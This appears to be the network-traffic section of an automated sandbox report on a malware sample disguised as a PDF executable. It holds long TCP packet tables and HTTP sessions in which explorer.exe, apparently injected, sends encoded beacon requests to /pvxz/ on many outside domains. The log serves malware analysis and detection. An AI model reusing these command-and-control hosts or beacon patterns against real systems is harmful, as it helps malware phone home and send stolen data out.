                                                                            Dec 1, 2021 16:22:56.400974035 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400979042 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.400985956 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.400996923 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401015043 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401020050 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401046991 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401076078 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401662111 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401726007 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401740074 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401752949 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401787996 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401801109 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401819944 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:22:56.401865959 CET 49751 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:22:56.401871920 CET 443 49751 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781553984 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781570911 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781580925 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781620026 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781625986 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781636953 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781701088 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781707048 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781721115 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781765938 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781783104 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781837940 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781841993 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781848907 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781888008 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781900883 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781943083 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781959057 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.781965971 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781980038 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.781989098 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.782013893 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.782020092 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.782051086 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.782088041 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.783299923 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.783335924 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.783406973 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.783418894 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.783482075 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.783546925 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798012972 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798101902 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798170090 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798191071 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798208952 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798244953 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798373938 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798399925 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798461914 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798475027 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798501015 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798523903 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798541069 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798568964 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798609018 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798613071 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798621893 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798664093 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798700094 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.798702002 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:14.798747063 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.913575888 CET 49754 443 192.168.2.3 162.159.129.233
                                                                            Dec 1, 2021 16:23:14.913621902 CET 443 49754 162.159.129.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.676069021 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.676120996 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.676214933 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.716367960 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.716406107 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.756385088 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.756571054 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.771951914 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.771981955 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.772363901 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.772449970 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.787898064 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.828882933 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840156078 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840262890 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840282917 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840333939 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840373039 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840374947 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840389013 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840389013 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840439081 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840445995 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840497017 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840497017 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840507984 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840558052 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840564013 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840616941 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840617895 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840629101 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840679884 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840686083 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840698004 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840742111 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840748072 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840780020 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840802908 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840810061 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840843916 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840867043 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840883017 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840888977 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840934038 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840938091 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840970039 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.840972900 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.840982914 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841006994 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841036081 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841061115 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841067076 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841092110 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841099977 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841120005 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841125965 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841162920 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841171026 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841197014 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841203928 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841208935 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841248035 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841253042 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841283083 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841288090 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841321945 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841322899 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841360092 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841361046 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841370106 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841403961 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841428041 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841444016 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841449022 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841485977 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841485977 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841522932 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841526031 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841533899 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841566086 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841592073 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841609001 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841614962 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841656923 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841667891 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841671944 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.841712952 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.841742992 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858000040 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858086109 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858129025 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858194113 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858241081 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858387947 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858393908 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858407021 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858428001 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858484983 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858491898 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858505964 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858545065 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858546972 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858592033 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858592987 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858607054 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858643055 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858681917 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858685970 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858697891 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858736038 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858747959 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858757973 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858779907 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858793974 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858823061 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858850956 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858855963 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858863115 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858870029 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858892918 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858900070 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858938932 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858966112 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.858973026 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.858979940 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.859000921 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.859090090 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.876399994 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.876518011 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.876524925 CET 49757 443 192.168.2.3 162.159.130.233
                                                                            Dec 1, 2021 16:23:21.876543999 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.876564026 CET 443 49757 162.159.130.233 192.168.2.3
                                                                            Dec 1, 2021 16:23:21.876595020 CET 49757 443 192.168.2.3 162.159.130.233

                                                                            UDP Packets

                                                                            Timestamp Source Port Dest Port Source IP Dest IP

                                                                            DNS Queries

                                                                            Timestamp Source IP Dest IP Trans ID OP Code Name Type Class

                                                                            DNS Answers

                                                                            Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class

                                                                            HTTP Request Dependency Graph


                                                                            HTTP Packets

                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            0 192.168.2.3 49750 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            1 192.168.2.3 49751 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            10 192.168.2.3 49838 198.54.117.211 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:25:54.218569040 CET 8656 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=VkzKqNHEMf7DVNqsETKs6wpXpLehvGO8WXwP2kNWjaoREXW57VMlBwZntpJdd+mq+oTm HTTP/1.1
                                                                            Host: www.enterprisedaas.computer
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            11 192.168.2.3 49839 64.69.40.19 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:00.029511929 CET 8656 OUT GET /pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj HTTP/1.1
                                                                            Host: www.hwkm.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:00.505376101 CET 8658 IN HTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 01 Dec 2021 15:26:00 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Data Ascii: 1ffc8<!DOCTYPE html><html><html><head> <title>BD-AV</title> <meta name="keywords" content="av,,,, ,av#,,,,,,"> <meta name="description" content="AV-CN22-AV,av,,,, ,av#,,,1,,,,,,,
                                                                            Dec 1, 2021 16:26:00.505429029 CET 8659 IN
                                                                            Data Ascii: ,,,renren"> <meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1
                                                                            Dec 1, 2021 16:26:00.799170971 CET 8661 IN
                                                                            Data Ascii: <a href="/" class="header-title">,, ,av#</a> </h1> <div class="search-wrap" style="margin-top: -1.5px; d
                                                                            Dec 1, 2021 16:26:00.799202919 CET 8662 IN
                                                                            Data Ascii: a class="cat-item" href="/1M4Ixs.html"></a> <a class="cat-item" href="/uU03gQ.html"></a> <a class="cat-item" href="/EN6qi5.html"></a>
                                                                            Dec 1, 2021 16:26:00.922574997 CET 8663 IN
                                                                            Data Ascii: 04.233.176.197/gg/1.html"></a> <a class="cat-item" href="http://104.233.176.197/gg/2.html"></a> <a class="cat-item" href="http://104.233.176.197/gg/3.html"><
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            12 192.168.2.3 49840 198.54.117.217 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:05.747251034 CET 8664 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/ HTTP/1.1
                                                                            Host: www.piiqrio.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            13 192.168.2.3 49841 86.105.245.69 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:16.046744108 CET 8665 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO HTTP/1.1
                                                                            Host: www.neema.xyz
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:16.108149052 CET 8665 IN HTTP/1.1 302 Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Wed, 01 Dec 2021 15:26:16 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=hpaghre5t8br9tmnkit5m23ut3; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            location: /
                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1 0
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            14 192.168.2.3 49842 66.235.200.145 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:21.440028906 CET 8666 OUT GET /pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj HTTP/1.1
                                                                            Host: www.cis136-tgarza.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            15 192.168.2.3 49843 156.235.157.134 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:27.398004055 CET 8667 OUT GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w HTTP/1.1
                                                                            Host: www.meishangtianhua.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:27.590044975 CET 8668 IN HTTP/1.1 200 OK
                                                                            Date: Wed, 01 Dec 2021 15:26:27 GMT
                                                                            Content-Length: 1705
                                                                            Content-Type: text/html
                                                                            Server: nginx
                                                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;</title><meta name="keywords" content="&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;" /><meta name="description" content="&#26085;&#26412;&#21478;&#31867;&#945;&#118;&#27431;&#32654;&#21478;&#31867;&#97;&#8564;,&#23047;&#22971;&#35753;&#22766;&#30007;&#24324;&#30340;&#27969;&#30333;&#27974;,&#26368;&#29275;&#22899;&#21397;&#20599;&#25293;&#27491;&#38754;&#26497;&#21697;,&#27060;&#33714;&#97;&#112;&#112;&#20813;&#36153;&#19979;&#36733;&#29256;,&#34588;&#33469;&#20122;&#27954;&#97;&#118;&#
                                                                            Dec 1, 2021 16:26:27.590081930 CET 8669 IN
                                                                            Data Ascii: 26080;&#30721;&#31934;&#21697;&#33394;&#21320;&#22812;,&#22269;&#20135;&#20081;&#23376;&#20262;&#39640;&#28165;&#38706;&#33080;&#23545;&#30333;," /><meta http-equi
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            16 192.168.2.3 49845 197.248.5.16 80 C:\Windows\explorer.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            Dec 1, 2021 16:26:32.977440119 CET 8676 OUT GET /pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj HTTP/1.1
                                                                            Host: www.finetipster.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Dec 1, 2021 16:26:33.168168068 CET 8677 IN HTTP/1.0 200 OK
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Expires: 0
                                                                            Connection: close
